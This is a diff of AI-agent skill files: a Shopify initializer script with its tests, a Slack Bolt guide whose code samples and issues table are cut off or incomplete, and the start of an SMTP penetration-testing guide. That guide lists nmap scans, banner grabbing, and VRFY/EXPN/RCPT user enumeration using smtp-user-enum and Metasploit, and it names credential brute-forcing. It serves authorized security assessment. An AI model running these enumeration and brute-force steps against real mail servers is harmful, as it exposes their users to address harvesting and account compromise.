print(f" cd {extension_name}")
|
||||
print(f" shopify app dev")
|
||||
|
||||
def init_theme(self) -> None:
|
||||
"""Initialize Shopify theme project."""
|
||||
print("\n=== Shopify Theme Initialization ===\n")
|
||||
|
||||
theme_name = self.prompt("Theme name", "my-theme")
|
||||
|
||||
print(f"\nInitializing theme '{theme_name}'...")
|
||||
print("\nRecommended: Use 'shopify theme init' for full theme scaffolding")
|
||||
print(f"\nRun: shopify theme init {theme_name}")
|
||||
|
||||
def run(self) -> None:
|
||||
"""Run interactive initialization."""
|
||||
print("=" * 60)
|
||||
print("Shopify Project Initializer")
|
||||
print("=" * 60)
|
||||
|
||||
# Check CLI
|
||||
if not self.check_cli_installed():
|
||||
print("\n⚠ Shopify CLI not found!")
|
||||
print("Install: npm install -g @shopify/cli@latest")
|
||||
sys.exit(1)
|
||||
|
||||
# Select project type
|
||||
project_types = ['app', 'extension', 'theme']
|
||||
project_type = self.select_option("Select project type", project_types)
|
||||
|
||||
# Initialize based on type
|
||||
if project_type == 'app':
|
||||
self.init_app()
|
||||
elif project_type == 'extension':
|
||||
self.init_extension()
|
||||
elif project_type == 'theme':
|
||||
self.init_theme()
|
||||
|
||||
|
||||
def main() -> None:
|
||||
"""Main entry point."""
|
||||
try:
|
||||
# Get skill directory
|
||||
script_dir = Path(__file__).parent
|
||||
skill_dir = script_dir.parent
|
||||
|
||||
# Load configuration
|
||||
config = EnvLoader.load_config(skill_dir)
|
||||
|
||||
# Initialize project
|
||||
initializer = ShopifyInitializer(config)
|
||||
initializer.run()
|
||||
|
||||
except KeyboardInterrupt:
|
||||
print("\n\nAborted.")
|
||||
sys.exit(0)
|
||||
except Exception as e:
|
||||
print(f"\n✗ Error: {e}", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
||||
379
skills/shopify-development/scripts/tests/test_shopify_init.py
Normal file
379
skills/shopify-development/scripts/tests/test_shopify_init.py
Normal file
@@ -0,0 +1,379 @@
|
||||
"""
|
||||
Tests for shopify_init.py
|
||||
|
||||
Run with: pytest test_shopify_init.py -v --cov=shopify_init --cov-report=term-missing
|
||||
"""
|
||||
|
||||
import os
|
||||
import sys
|
||||
import json
|
||||
import pytest
|
||||
import subprocess
|
||||
from pathlib import Path
|
||||
from unittest.mock import Mock, patch, mock_open, MagicMock
|
||||
|
||||
sys.path.insert(0, str(Path(__file__).parent.parent))
|
||||
|
||||
from shopify_init import EnvLoader, EnvConfig, ShopifyInitializer
|
||||
|
||||
|
||||
class TestEnvLoader:
|
||||
"""Test EnvLoader class."""
|
||||
|
||||
def test_load_env_file_success(self, tmp_path):
|
||||
"""Test loading valid .env file."""
|
||||
env_file = tmp_path / ".env"
|
||||
env_file.write_text("""
|
||||
SHOPIFY_API_KEY=test_key
|
||||
SHOPIFY_API_SECRET=test_secret
|
||||
SHOP_DOMAIN=test.myshopify.com
|
||||
# Comment line
|
||||
SCOPES=read_products,write_products
|
||||
""")
|
||||
|
||||
result = EnvLoader.load_env_file(env_file)
|
||||
|
||||
assert result['SHOPIFY_API_KEY'] == 'test_key'
|
||||
assert result['SHOPIFY_API_SECRET'] == 'test_secret'
|
||||
assert result['SHOP_DOMAIN'] == 'test.myshopify.com'
|
||||
assert result['SCOPES'] == 'read_products,write_products'
|
||||
|
||||
def test_load_env_file_with_quotes(self, tmp_path):
|
||||
"""Test loading .env file with quoted values."""
|
||||
env_file = tmp_path / ".env"
|
||||
env_file.write_text("""
|
||||
SHOPIFY_API_KEY="test_key"
|
||||
SHOPIFY_API_SECRET='test_secret'
|
||||
""")
|
||||
|
||||
result = EnvLoader.load_env_file(env_file)
|
||||
|
||||
assert result['SHOPIFY_API_KEY'] == 'test_key'
|
||||
assert result['SHOPIFY_API_SECRET'] == 'test_secret'
|
||||
|
||||
def test_load_env_file_nonexistent(self, tmp_path):
|
||||
"""Test loading non-existent .env file."""
|
||||
result = EnvLoader.load_env_file(tmp_path / "nonexistent.env")
|
||||
assert result == {}
|
||||
|
||||
def test_load_env_file_invalid_format(self, tmp_path):
|
||||
"""Test loading .env file with invalid lines."""
|
||||
env_file = tmp_path / ".env"
|
||||
env_file.write_text("""
|
||||
VALID_KEY=value
|
||||
INVALID_LINE_NO_EQUALS
|
||||
ANOTHER_VALID=test
|
||||
""")
|
||||
|
||||
result = EnvLoader.load_env_file(env_file)
|
||||
|
||||
assert result['VALID_KEY'] == 'value'
|
||||
assert result['ANOTHER_VALID'] == 'test'
|
||||
assert 'INVALID_LINE_NO_EQUALS' not in result
|
||||
|
||||
def test_get_env_paths(self, tmp_path):
|
||||
"""Test getting .env file paths from universal directory structure."""
|
||||
# Create directory structure (works with .agent, .claude, .gemini, .cursor)
|
||||
agent_dir = tmp_path / ".agent"
|
||||
skills_dir = agent_dir / "skills"
|
||||
skill_dir = skills_dir / "shopify"
|
||||
|
||||
skill_dir.mkdir(parents=True)
|
||||
|
||||
# Create .env files at each level
|
||||
(skill_dir / ".env").write_text("SKILL=1")
|
||||
(skills_dir / ".env").write_text("SKILLS=1")
|
||||
(agent_dir / ".env").write_text("AGENT=1")
|
||||
|
||||
paths = EnvLoader.get_env_paths(skill_dir)
|
||||
|
||||
assert len(paths) == 3
|
||||
assert skill_dir / ".env" in paths
|
||||
assert skills_dir / ".env" in paths
|
||||
assert agent_dir / ".env" in paths
|
||||
|
||||
def test_load_config_priority(self, tmp_path, monkeypatch):
|
||||
"""Test configuration loading priority across different AI tool directories."""
|
||||
skill_dir = tmp_path / "skill"
|
||||
skills_dir = tmp_path
|
||||
agent_dir = tmp_path.parent # Could be .agent, .claude, .gemini, .cursor
|
||||
|
||||
skill_dir.mkdir(parents=True)
|
||||
|
||||
(skill_dir / ".env").write_text("SHOPIFY_API_KEY=skill_key")
|
||||
(skills_dir / ".env").write_text("SHOPIFY_API_KEY=skills_key\nSHOP_DOMAIN=skills.myshopify.com")
|
||||
|
||||
monkeypatch.setenv("SHOPIFY_API_KEY", "process_key")
|
||||
|
||||
config = EnvLoader.load_config(skill_dir)
|
||||
|
||||
assert config.shopify_api_key == "process_key"
|
||||
# Shop domain from skills/.env
|
||||
assert config.shop_domain == "skills.myshopify.com"
|
||||
|
||||
def test_load_config_no_files(self, tmp_path):
|
||||
"""Test configuration loading with no .env files."""
|
||||
config = EnvLoader.load_config(tmp_path)
|
||||
|
||||
assert config.shopify_api_key is None
|
||||
assert config.shopify_api_secret is None
|
||||
assert config.shop_domain is None
|
||||
assert config.scopes is None
|
||||
|
||||
|
||||
class TestShopifyInitializer:
|
||||
"""Test ShopifyInitializer class."""
|
||||
|
||||
@pytest.fixture
|
||||
def config(self):
|
||||
"""Create test config."""
|
||||
return EnvConfig(
|
||||
shopify_api_key="test_key",
|
||||
shopify_api_secret="test_secret",
|
||||
shop_domain="test.myshopify.com",
|
||||
scopes="read_products,write_products"
|
||||
)
|
||||
|
||||
@pytest.fixture
|
||||
def initializer(self, config):
|
||||
"""Create initializer instance."""
|
||||
return ShopifyInitializer(config)
|
||||
|
||||
def test_prompt_with_default(self, initializer):
|
||||
"""Test prompt with default value."""
|
||||
with patch('builtins.input', return_value=''):
|
||||
result = initializer.prompt("Test", "default_value")
|
||||
assert result == "default_value"
|
||||
|
||||
def test_prompt_with_input(self, initializer):
|
||||
"""Test prompt with user input."""
|
||||
with patch('builtins.input', return_value='user_input'):
|
||||
result = initializer.prompt("Test", "default_value")
|
||||
assert result == "user_input"
|
||||
|
||||
def test_select_option_valid(self, initializer):
|
||||
"""Test select option with valid choice."""
|
||||
options = ['app', 'extension', 'theme']
|
||||
with patch('builtins.input', return_value='2'):
|
||||
result = initializer.select_option("Choose", options)
|
||||
assert result == 'extension'
|
||||
|
||||
def test_select_option_invalid_then_valid(self, initializer):
|
||||
"""Test select option with invalid then valid choice."""
|
||||
options = ['app', 'extension']
|
||||
with patch('builtins.input', side_effect=['5', 'invalid', '1']):
|
||||
result = initializer.select_option("Choose", options)
|
||||
assert result == 'app'
|
||||
|
||||
def test_check_cli_installed_success(self, initializer):
|
||||
"""Test CLI installed check - success."""
|
||||
mock_result = Mock()
|
||||
mock_result.returncode = 0
|
||||
|
||||
with patch('subprocess.run', return_value=mock_result):
|
||||
assert initializer.check_cli_installed() is True
|
||||
|
||||
def test_check_cli_installed_failure(self, initializer):
|
||||
"""Test CLI installed check - failure."""
|
||||
with patch('subprocess.run', side_effect=FileNotFoundError):
|
||||
assert initializer.check_cli_installed() is False
|
||||
|
||||
def test_create_app_config(self, initializer, tmp_path):
|
||||
"""Test creating app configuration file."""
|
||||
initializer.create_app_config(tmp_path, "test-app", "read_products")
|
||||
|
||||
config_file = tmp_path / "shopify.app.toml"
|
||||
assert config_file.exists()
|
||||
|
||||
content = config_file.read_text()
|
||||
assert 'name = "test-app"' in content
|
||||
assert 'scopes = "read_products"' in content
|
||||
assert 'client_id = "test_key"' in content
|
||||
|
||||
def test_create_extension_config(self, initializer, tmp_path):
|
||||
"""Test creating extension configuration file."""
|
||||
initializer.create_extension_config(tmp_path, "test-ext", "checkout")
|
||||
|
||||
config_file = tmp_path / "shopify.extension.toml"
|
||||
assert config_file.exists()
|
||||
|
||||
content = config_file.read_text()
|
||||
assert 'name = "test-ext"' in content
|
||||
assert 'purchase.checkout.block.render' in content
|
||||
|
||||
def test_create_extension_config_admin_action(self, initializer, tmp_path):
|
||||
"""Test creating admin action extension config."""
|
||||
initializer.create_extension_config(tmp_path, "admin-ext", "admin_action")
|
||||
|
||||
config_file = tmp_path / "shopify.extension.toml"
|
||||
content = config_file.read_text()
|
||||
assert 'admin.product-details.action.render' in content
|
||||
|
||||
def test_create_readme(self, initializer, tmp_path):
|
||||
"""Test creating README file."""
|
||||
initializer.create_readme(tmp_path, "app", "Test App")
|
||||
|
||||
readme_file = tmp_path / "README.md"
|
||||
assert readme_file.exists()
|
||||
|
||||
content = readme_file.read_text()
|
||||
assert '# Test App' in content
|
||||
assert 'shopify app dev' in content
|
||||
|
||||
@patch('builtins.input')
|
||||
@patch('builtins.print')
|
||||
def test_init_app(self, mock_print, mock_input, initializer, tmp_path, monkeypatch):
|
||||
"""Test app initialization."""
|
||||
monkeypatch.chdir(tmp_path)
|
||||
|
||||
# Mock user inputs
|
||||
mock_input.side_effect = ['my-app', 'read_products,write_products']
|
||||
|
||||
initializer.init_app()
|
||||
|
||||
# Check directory created
|
||||
app_dir = tmp_path / "my-app"
|
||||
assert app_dir.exists()
|
||||
|
||||
# Check files created
|
||||
assert (app_dir / "shopify.app.toml").exists()
|
||||
assert (app_dir / "README.md").exists()
|
||||
assert (app_dir / "package.json").exists()
|
||||
|
||||
# Check package.json content
|
||||
package_json = json.loads((app_dir / "package.json").read_text())
|
||||
assert package_json['name'] == 'my-app'
|
||||
assert 'dev' in package_json['scripts']
|
||||
|
||||
@patch('builtins.input')
|
||||
@patch('builtins.print')
|
||||
def test_init_extension(self, mock_print, mock_input, initializer, tmp_path, monkeypatch):
|
||||
"""Test extension initialization."""
|
||||
monkeypatch.chdir(tmp_path)
|
||||
|
||||
# Mock user inputs: type selection (1 = checkout), name
|
||||
mock_input.side_effect = ['1', 'my-extension']
|
||||
|
||||
initializer.init_extension()
|
||||
|
||||
# Check directory and files created
|
||||
ext_dir = tmp_path / "my-extension"
|
||||
assert ext_dir.exists()
|
||||
assert (ext_dir / "shopify.extension.toml").exists()
|
||||
assert (ext_dir / "README.md").exists()
|
||||
|
||||
@patch('builtins.input')
|
||||
@patch('builtins.print')
|
||||
def test_init_theme(self, mock_print, mock_input, initializer):
|
||||
"""Test theme initialization."""
|
||||
mock_input.return_value = 'my-theme'
|
||||
|
||||
initializer.init_theme()
|
||||
|
||||
assert mock_print.called
|
||||
|
||||
@patch('builtins.print')
|
||||
def test_run_no_cli(self, mock_print, initializer):
|
||||
"""Test run when CLI not installed."""
|
||||
with patch.object(initializer, 'check_cli_installed', return_value=False):
|
||||
with pytest.raises(SystemExit) as exc_info:
|
||||
initializer.run()
|
||||
assert exc_info.value.code == 1
|
||||
|
||||
@patch.object(ShopifyInitializer, 'check_cli_installed', return_value=True)
|
||||
@patch.object(ShopifyInitializer, 'init_app')
|
||||
@patch('builtins.input')
|
||||
@patch('builtins.print')
|
||||
def test_run_app_selected(self, mock_print, mock_input, mock_init_app, mock_cli_check, initializer):
|
||||
"""Test run with app selection."""
|
||||
mock_input.return_value = '1' # Select app
|
||||
|
||||
initializer.run()
|
||||
|
||||
mock_init_app.assert_called_once()
|
||||
|
||||
@patch.object(ShopifyInitializer, 'check_cli_installed', return_value=True)
|
||||
@patch.object(ShopifyInitializer, 'init_extension')
|
||||
@patch('builtins.input')
|
||||
@patch('builtins.print')
|
||||
def test_run_extension_selected(self, mock_print, mock_input, mock_init_ext, mock_cli_check, initializer):
|
||||
"""Test run with extension selection."""
|
||||
mock_input.return_value = '2' # Select extension
|
||||
|
||||
initializer.run()
|
||||
|
||||
mock_init_ext.assert_called_once()
|
||||
|
||||
|
||||
class TestMain:
|
||||
"""Test main function."""
|
||||
|
||||
@patch('shopify_init.ShopifyInitializer')
|
||||
@patch('shopify_init.EnvLoader')
|
||||
def test_main_success(self, mock_loader, mock_initializer):
|
||||
"""Test main function success path."""
|
||||
from shopify_init import main
|
||||
|
||||
mock_config = Mock()
|
||||
mock_loader.load_config.return_value = mock_config
|
||||
|
||||
mock_init_instance = Mock()
|
||||
mock_initializer.return_value = mock_init_instance
|
||||
|
||||
with patch('builtins.print'):
|
||||
main()
|
||||
|
||||
mock_init_instance.run.assert_called_once()
|
||||
|
||||
@patch('shopify_init.ShopifyInitializer')
|
||||
@patch('sys.exit')
|
||||
def test_main_keyboard_interrupt(self, mock_exit, mock_initializer):
|
||||
"""Test main function with keyboard interrupt."""
|
||||
from shopify_init import main
|
||||
|
||||
mock_initializer.return_value.run.side_effect = KeyboardInterrupt
|
||||
|
||||
with patch('builtins.print'):
|
||||
main()
|
||||
|
||||
mock_exit.assert_called_with(0)
|
||||
|
||||
@patch('shopify_init.ShopifyInitializer')
|
||||
@patch('sys.exit')
|
||||
def test_main_exception(self, mock_exit, mock_initializer):
|
||||
"""Test main function with exception."""
|
||||
from shopify_init import main
|
||||
|
||||
mock_initializer.return_value.run.side_effect = Exception("Test error")
|
||||
|
||||
with patch('builtins.print'):
|
||||
main()
|
||||
|
||||
mock_exit.assert_called_with(1)
|
||||
|
||||
|
||||
class TestEnvConfig:
|
||||
"""Test EnvConfig dataclass."""
|
||||
|
||||
def test_env_config_defaults(self):
|
||||
"""Test EnvConfig default values."""
|
||||
config = EnvConfig()
|
||||
|
||||
assert config.shopify_api_key is None
|
||||
assert config.shopify_api_secret is None
|
||||
assert config.shop_domain is None
|
||||
assert config.scopes is None
|
||||
|
||||
def test_env_config_with_values(self):
|
||||
"""Test EnvConfig with values."""
|
||||
config = EnvConfig(
|
||||
shopify_api_key="key",
|
||||
shopify_api_secret="secret",
|
||||
shop_domain="test.myshopify.com",
|
||||
scopes="read_products"
|
||||
)
|
||||
|
||||
assert config.shopify_api_key == "key"
|
||||
assert config.shopify_api_secret == "secret"
|
||||
assert config.shop_domain == "test.myshopify.com"
|
||||
assert config.scopes == "read_products"
|
||||
264
skills/slack-bot-builder/SKILL.md
Normal file
264
skills/slack-bot-builder/SKILL.md
Normal file
@@ -0,0 +1,264 @@
|
||||
---
|
||||
name: slack-bot-builder
|
||||
description: "Build Slack apps using the Bolt framework across Python, JavaScript, and Java. Covers Block Kit for rich UIs, interactive components, slash commands, event handling, OAuth installation flows, and Workflow Builder integration. Focus on best practices for production-ready Slack apps. Use when: slack bot, slack app, bolt framework, block kit, slash command."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Slack Bot Builder
|
||||
|
||||
## Patterns
|
||||
|
||||
### Bolt App Foundation Pattern
|
||||
|
||||
The Bolt framework is Slack's recommended approach for building apps.
|
||||
It handles authentication, event routing, request verification, and
|
||||
HTTP request processing so you can focus on app logic.
|
||||
|
||||
Key benefits:
|
||||
- Event handling in a few lines of code
|
||||
- Security checks and payload validation built-in
|
||||
- Organized, consistent patterns
|
||||
- Works for experiments and production
|
||||
|
||||
Available in: Python, JavaScript (Node.js), Java
|
||||
|
||||
|
||||
**When to use**: ['Starting any new Slack app', 'Migrating from legacy Slack APIs', 'Building production Slack integrations']
|
||||
|
||||
```python
|
||||
# Python Bolt App
|
||||
from slack_bolt import App
|
||||
from slack_bolt.adapter.socket_mode import SocketModeHandler
|
||||
import os
|
||||
|
||||
# Initialize with tokens from environment
|
||||
app = App(
|
||||
token=os.environ["SLACK_BOT_TOKEN"],
|
||||
signing_secret=os.environ["SLACK_SIGNING_SECRET"]
|
||||
)
|
||||
|
||||
# Handle messages containing "hello"
|
||||
@app.message("hello")
|
||||
def handle_hello(message, say):
|
||||
"""Respond to messages containing 'hello'."""
|
||||
user = message["user"]
|
||||
say(f"Hey there <@{user}>!")
|
||||
|
||||
# Handle slash command
|
||||
@app.command("/ticket")
|
||||
def handle_ticket_command(ack, body, client):
|
||||
"""Handle /ticket slash command."""
|
||||
# Acknowledge immediately (within 3 seconds)
|
||||
ack()
|
||||
|
||||
# Open a modal for ticket creation
|
||||
client.views_open(
|
||||
trigger_id=body["trigger_id"],
|
||||
view={
|
||||
"type": "modal",
|
||||
"callback_id": "ticket_modal",
|
||||
"title": {"type": "plain_text", "text": "Create Ticket"},
|
||||
"submit": {"type": "plain_text", "text": "Submit"},
|
||||
"blocks": [
|
||||
{
|
||||
"type": "input",
|
||||
"block_id": "title_block",
|
||||
"element": {
|
||||
"type": "plain_text_input",
|
||||
"action_id": "title_input"
|
||||
},
|
||||
"label": {"type": "plain_text", "text": "Title"}
|
||||
},
|
||||
{
|
||||
"type": "input",
|
||||
"block_id": "desc_block",
|
||||
"element": {
|
||||
"type": "plain_text_input",
|
||||
"multiline": True,
|
||||
"action_id": "desc_input"
|
||||
},
|
||||
"label": {"type": "plain_text", "text": "Description"}
|
||||
},
|
||||
{
|
||||
"type": "input",
|
||||
"block_id": "priority_block",
|
||||
"element": {
|
||||
"type": "static_select",
|
||||
"action_id": "priority_select",
|
||||
|
||||
```
|
||||
|
||||
### Block Kit UI Pattern
|
||||
|
||||
Block Kit is Slack's UI framework for building rich, interactive messages.
|
||||
Compose messages using blocks (sections, actions, inputs) and elements
|
||||
(buttons, menus, text inputs).
|
||||
|
||||
Limits:
|
||||
- Up to 50 blocks per message
|
||||
- Up to 100 blocks in modals/Home tabs
|
||||
- Block text limited to 3000 characters
|
||||
|
||||
Use Block Kit Builder to prototype: https://app.slack.com/block-kit-builder
|
||||
|
||||
|
||||
**When to use**: ['Building rich message layouts', 'Adding interactive components to messages', 'Creating forms in modals', 'Building Home tab experiences']
|
||||
|
||||
```python
|
||||
from slack_bolt import App
|
||||
import os
|
||||
|
||||
app = App(token=os.environ["SLACK_BOT_TOKEN"])
|
||||
|
||||
def build_notification_blocks(incident: dict) -> list:
|
||||
"""Build Block Kit blocks for incident notification."""
|
||||
severity_emoji = {
|
||||
"critical": ":red_circle:",
|
||||
"high": ":large_orange_circle:",
|
||||
"medium": ":large_yellow_circle:",
|
||||
"low": ":white_circle:"
|
||||
}
|
||||
|
||||
return [
|
||||
# Header
|
||||
{
|
||||
"type": "header",
|
||||
"text": {
|
||||
"type": "plain_text",
|
||||
"text": f"{severity_emoji.get(incident['severity'], '')} Incident Alert"
|
||||
}
|
||||
},
|
||||
# Details section
|
||||
{
|
||||
"type": "section",
|
||||
"fields": [
|
||||
{
|
||||
"type": "mrkdwn",
|
||||
"text": f"*Incident:*\n{incident['title']}"
|
||||
},
|
||||
{
|
||||
"type": "mrkdwn",
|
||||
"text": f"*Severity:*\n{incident['severity'].upper()}"
|
||||
},
|
||||
{
|
||||
"type": "mrkdwn",
|
||||
"text": f"*Service:*\n{incident['service']}"
|
||||
},
|
||||
{
|
||||
"type": "mrkdwn",
|
||||
"text": f"*Reported:*\n<!date^{incident['timestamp']}^{date_short} {time}|{incident['timestamp']}>"
|
||||
}
|
||||
]
|
||||
},
|
||||
# Description
|
||||
{
|
||||
"type": "section",
|
||||
"text": {
|
||||
"type": "mrkdwn",
|
||||
"text": f"*Description:*\n{incident['description'][:2000]}"
|
||||
}
|
||||
},
|
||||
# Divider
|
||||
{"type": "divider"},
|
||||
# Action buttons
|
||||
{
|
||||
"type": "actions",
|
||||
"block_id": f"incident_actions_{incident['id']}",
|
||||
"elements": [
|
||||
{
|
||||
"type": "button",
|
||||
"text": {"type": "plain_text", "text": "Acknowledge"},
|
||||
"style": "primary",
|
||||
"action_id": "acknowle
|
||||
```
|
||||
|
||||
### OAuth Installation Pattern
|
||||
|
||||
Enable users to install your app in their workspaces via OAuth 2.0.
|
||||
Bolt handles most of the OAuth flow, but you need to configure it
|
||||
and store tokens securely.
|
||||
|
||||
Key OAuth concepts:
|
||||
- Scopes define permissions (request minimum needed)
|
||||
- Tokens are workspace-specific
|
||||
- Installation data must be stored persistently
|
||||
- Users can add scopes later (additive)
|
||||
|
||||
70% of users abandon installation when confronted with excessive
|
||||
permission requests - request only what you need!
|
||||
|
||||
|
||||
**When to use**: ['Distributing app to multiple workspaces', 'Building public Slack apps', 'Enterprise-grade integrations']
|
||||
|
||||
```python
|
||||
from slack_bolt import App
|
||||
from slack_bolt.oauth.oauth_settings import OAuthSettings
|
||||
from slack_sdk.oauth.installation_store import FileInstallationStore
|
||||
from slack_sdk.oauth.state_store import FileOAuthStateStore
|
||||
import os
|
||||
|
||||
# For production, use database-backed stores
|
||||
# For example: PostgreSQL, MongoDB, Redis
|
||||
|
||||
class DatabaseInstallationStore:
|
||||
"""Store installation data in your database."""
|
||||
|
||||
async def save(self, installation):
|
||||
"""Save installation when user completes OAuth."""
|
||||
await db.installations.upsert({
|
||||
"team_id": installation.team_id,
|
||||
"enterprise_id": installation.enterprise_id,
|
||||
"bot_token": encrypt(installation.bot_token),
|
||||
"bot_user_id": installation.bot_user_id,
|
||||
"bot_scopes": installation.bot_scopes,
|
||||
"user_id": installation.user_id,
|
||||
"installed_at": installation.installed_at
|
||||
})
|
||||
|
||||
async def find_installation(self, *, enterprise_id, team_id, user_id=None, is_enterprise_install=False):
|
||||
"""Find installation for a workspace."""
|
||||
record = await db.installations.find_one({
|
||||
"team_id": team_id,
|
||||
"enterprise_id": enterprise_id
|
||||
})
|
||||
|
||||
if record:
|
||||
return Installation(
|
||||
bot_token=decrypt(record["bot_token"]),
|
||||
# ... other fields
|
||||
)
|
||||
return None
|
||||
|
||||
# Initialize OAuth-enabled app
|
||||
app = App(
|
||||
signing_secret=os.environ["SLACK_SIGNING_SECRET"],
|
||||
oauth_settings=OAuthSettings(
|
||||
client_id=os.environ["SLACK_CLIENT_ID"],
|
||||
client_secret=os.environ["SLACK_CLIENT_SECRET"],
|
||||
scopes=[
|
||||
"channels:history",
|
||||
"channels:read",
|
||||
"chat:write",
|
||||
"commands",
|
||||
"users:read"
|
||||
],
|
||||
user_scopes=[], # User token scopes if needed
|
||||
installation_store=DatabaseInstallationStore(),
|
||||
state_store=FileOAuthStateStore(expiration_seconds=600)
|
||||
)
|
||||
)
|
||||
|
||||
# OAuth routes are handled a
|
||||
```
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | critical | ## Acknowledge immediately, process later |
|
||||
| Issue | critical | ## Proper state validation |
|
||||
| Issue | critical | ## Never hardcode or log tokens |
|
||||
| Issue | high | ## Request minimum required scopes |
|
||||
| Issue | medium | ## Know and respect the limits |
|
||||
| Issue | high | ## Socket Mode: Only for development |
|
||||
| Issue | critical | ## Bolt handles this automatically |
|
||||
497
skills/smtp-penetration-testing/SKILL.md
Normal file
497
skills/smtp-penetration-testing/SKILL.md
Normal file
@@ -0,0 +1,497 @@
|
||||
---
|
||||
name: SMTP Penetration Testing
|
||||
description: This skill should be used when the user asks to "perform SMTP penetration testing", "enumerate email users", "test for open mail relays", "grab SMTP banners", "brute force email credentials", or "assess mail server security". It provides comprehensive techniques for testing SMTP server security.
|
||||
---
|
||||
|
||||
# SMTP Penetration Testing
|
||||
|
||||
## Purpose
|
||||
|
||||
Conduct comprehensive security assessments of SMTP (Simple Mail Transfer Protocol) servers to identify vulnerabilities including open relays, user enumeration, weak authentication, and misconfiguration. This skill covers banner grabbing, user enumeration techniques, relay testing, brute force attacks, and security hardening recommendations.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
### Required Tools
|
||||
```bash
|
||||
# Nmap with SMTP scripts
|
||||
sudo apt-get install nmap
|
||||
|
||||
# Netcat
|
||||
sudo apt-get install netcat
|
||||
|
||||
# Hydra for brute force
|
||||
sudo apt-get install hydra
|
||||
|
||||
# SMTP user enumeration tool
|
||||
sudo apt-get install smtp-user-enum
|
||||
|
||||
# Metasploit Framework
|
||||
msfconsole
|
||||
```
|
||||
|
||||
### Required Knowledge
|
||||
- SMTP protocol fundamentals
|
||||
- Email architecture (MTA, MDA, MUA)
|
||||
- DNS and MX records
|
||||
- Network protocols
|
||||
|
||||
### Required Access
|
||||
- Target SMTP server IP/hostname
|
||||
- Written authorization for testing
|
||||
- Wordlists for enumeration and brute force
|
||||
|
||||
## Outputs and Deliverables
|
||||
|
||||
1. **SMTP Security Assessment Report** - Comprehensive vulnerability findings
|
||||
2. **User Enumeration Results** - Valid email addresses discovered
|
||||
3. **Relay Test Results** - Open relay status and exploitation potential
|
||||
4. **Remediation Recommendations** - Security hardening guidance
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Phase 1: SMTP Architecture Understanding
|
||||
|
||||
```
|
||||
Components: MTA (transfer) → MDA (delivery) → MUA (client)
|
||||
|
||||
Ports: 25 (SMTP), 465 (SMTPS), 587 (submission), 2525 (alternative)
|
||||
|
||||
Workflow: Sender MUA → Sender MTA → DNS/MX → Recipient MTA → MDA → Recipient MUA
|
||||
```
|
||||
|
||||
### Phase 2: SMTP Service Discovery
|
||||
|
||||
Identify SMTP servers and versions:
|
||||
|
||||
```bash
|
||||
# Discover SMTP ports
|
||||
nmap -p 25,465,587,2525 -sV TARGET_IP
|
||||
|
||||
# Aggressive service detection
|
||||
nmap -sV -sC -p 25 TARGET_IP
|
||||
|
||||
# SMTP-specific scripts
|
||||
nmap --script=smtp-* -p 25 TARGET_IP
|
||||
|
||||
# Discover MX records for domain
|
||||
dig MX target.com
|
||||
nslookup -type=mx target.com
|
||||
host -t mx target.com
|
||||
```
|
||||
|
||||
### Phase 3: Banner Grabbing
|
||||
|
||||
Retrieve SMTP server information:
|
||||
|
||||
```bash
|
||||
# Using Telnet
|
||||
telnet TARGET_IP 25
|
||||
# Response: 220 mail.target.com ESMTP Postfix
|
||||
|
||||
# Using Netcat
|
||||
nc TARGET_IP 25
|
||||
# Response: 220 mail.target.com ESMTP
|
||||
|
||||
# Using Nmap
|
||||
nmap -sV -p 25 TARGET_IP
|
||||
# Version detection extracts banner info
|
||||
|
||||
# Manual SMTP commands
|
||||
EHLO test
|
||||
# Response reveals supported extensions
|
||||
```
|
||||
|
||||
Parse banner information:
|
||||
|
||||
```
|
||||
Banner reveals:
|
||||
- Server software (Postfix, Sendmail, Exchange)
|
||||
- Version information
|
||||
- Hostname
|
||||
- Supported SMTP extensions (STARTTLS, AUTH, etc.)
|
||||
```
|
||||
|
||||
### Phase 4: SMTP Command Enumeration
|
||||
|
||||
Test available SMTP commands:
|
||||
|
||||
```bash
|
||||
# Connect and test commands
|
||||
nc TARGET_IP 25
|
||||
|
||||
# Initial greeting
|
||||
EHLO attacker.com
|
||||
|
||||
# Response shows capabilities:
|
||||
250-mail.target.com
|
||||
250-PIPELINING
|
||||
250-SIZE 10240000
|
||||
250-VRFY
|
||||
250-ETRN
|
||||
250-STARTTLS
|
||||
250-AUTH PLAIN LOGIN
|
||||
250-8BITMIME
|
||||
250 DSN
|
||||
```
|
||||
|
||||
Key commands to test:
|
||||
|
||||
```bash
|
||||
# VRFY - Verify user exists
|
||||
VRFY admin
|
||||
250 2.1.5 admin@target.com
|
||||
|
||||
# EXPN - Expand mailing list
|
||||
EXPN staff
|
||||
250 2.1.5 user1@target.com
|
||||
250 2.1.5 user2@target.com
|
||||
|
||||
# RCPT TO - Recipient verification
|
||||
MAIL FROM:<test@attacker.com>
|
||||
RCPT TO:<admin@target.com>
|
||||
# 250 OK = user exists
|
||||
# 550 = user doesn't exist
|
||||
```
|
||||
|
||||
### Phase 5: User Enumeration
|
||||
|
||||
Enumerate valid email addresses:
|
||||
|
||||
```bash
|
||||
# Using smtp-user-enum with VRFY
|
||||
smtp-user-enum -M VRFY -U /usr/share/wordlists/users.txt -t TARGET_IP
|
||||
|
||||
# Using EXPN method
|
||||
smtp-user-enum -M EXPN -U /usr/share/wordlists/users.txt -t TARGET_IP
|
||||
|
||||
# Using RCPT method
|
||||
smtp-user-enum -M RCPT -U /usr/share/wordlists/users.txt -t TARGET_IP
|
||||
|
||||
# Specify port and domain
|
||||
smtp-user-enum -M VRFY -U users.txt -t TARGET_IP -p 25 -d target.com
|
||||
```
|
||||
|
||||
Using Metasploit:
|
||||
|
||||
```bash
|
||||
use auxiliary/scanner/smtp/smtp_enum
|
||||
set RHOSTS TARGET_IP
|
||||
set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
|
||||
set UNIXONLY true
|
||||
run
|
||||
```
|
||||
|
||||
Using Nmap:
|
||||
|
||||
```bash
|
||||
# SMTP user enumeration script
|
||||
nmap --script smtp-enum-users -p 25 TARGET_IP
|
||||
|
||||
# With custom user list
|
||||
nmap --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY,EXPN,RCPT} -p 25 TARGET_IP
|
||||
```
|
||||
|
||||
